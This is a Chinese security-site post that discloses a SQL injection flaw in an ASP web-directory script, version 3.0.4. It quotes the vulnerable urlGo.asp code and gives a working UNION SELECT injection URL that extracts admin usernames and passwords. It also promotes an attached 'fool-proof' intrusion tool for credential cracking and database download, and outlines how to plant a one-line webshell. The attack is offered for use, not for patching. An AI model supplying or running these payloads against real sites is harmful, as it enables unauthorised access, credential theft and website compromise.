ARP联盟图文中心下载中心手机频道最近更新软件最近更新文章网络热点
您当前的位置→图文中心安全防范深度学习(asp)网址导航v3.0.4 0day
站内搜索:

深度学习(asp)网址导航v3.0.4 0day


2009/10/12  编辑:admin 来源:转载 

参考消息:http://www.arpun.com/んㄗ葑訫鎖愛'S  Blog  http://www.virusest.com/
深度学习(asp)网址导航 v3.0.4 存在Sql注入漏洞
问题代码urlGo.asp:
<!--#include file="connDB.asp"-->
<!--#include file="include/Function.Common.asp"-->
<%
id=request.QueryString("id")
if id="" then
 response.Redirect("/")
end if
'-----网址--------------
Set rsWebUrl=Server.CreateObject("Adodb.Recordset")
sqlC="select  * from tWebUrl where fpassed=1 and fid=" & id
rsWebUrl.open sQLC,conn,0,1
if rsWebUrl.Eof and rsWebUrl.Bof then
 response.Redirect("/")
else
%>
很明显,可以注入,而且头文件由于程序员疏忽,很配合的没调用防注入系统.其他文件均调用防注入.
利用:注意注入点用明小子或者啊D检测不出来,简单写下注入语句:
http://localhost/urlGo.asp?id=4233%20and%201=2%20union%20select%201,2,fusername,4,5,6,7,8,9,10%20from%20tAdmin
查密码只需把fusername改成fpassword,但是在测试的时候,发现因版本不同,可能表段长度不同,如果提示列数不匹配,则换成9个即可.
这里我写了利用工具,傻瓜式入侵,其中,ID值为在搜索引擎中看到的ID,如图:
工具集成了暴密码账号,后台访问,数据库下载MD5破解等功能,工具和源码见附件.
未加壳,欢迎篡改版权!好久没写程序了,就当练手吧!
Ps:后台拿Shell比较费劲,提示空壳数据库,先恢复在备份,再一句话!

更多精彩,请查看本类栏目: 安全防范
除非注明,ARP联盟文章来于网络,投稿原创等,转载请以链接形式标明本文地址。
本文地址:http://www.arpun.com/article/4523.html

相关文章
  • ·[2015-3-19]更新免费软件[深度整理]
  • ·[图文]WiFi万能钥匙软件安全吗?深度剖析如何破解无线密码
  • ·[图文]深度技术Win7旗舰版虚拟内存优化技巧
  • ·[图文]烧饼修改器综合、深度、模糊、联合搜索使用技巧
  • ·[2014-12-13]更新免费软件[深度整理]
  • ·[2014-12-6]更新免费软件[深度整理]
  • ·[2014-12-4]更新免费软件[深度整理]
  • ·[2014-12-2]更新免费软件[深度整理]
  • 发表评论
    栏目列表
    阅读排行
    本类最新
    网站帮助 - 广告合作 - 下载声明 - 网站地图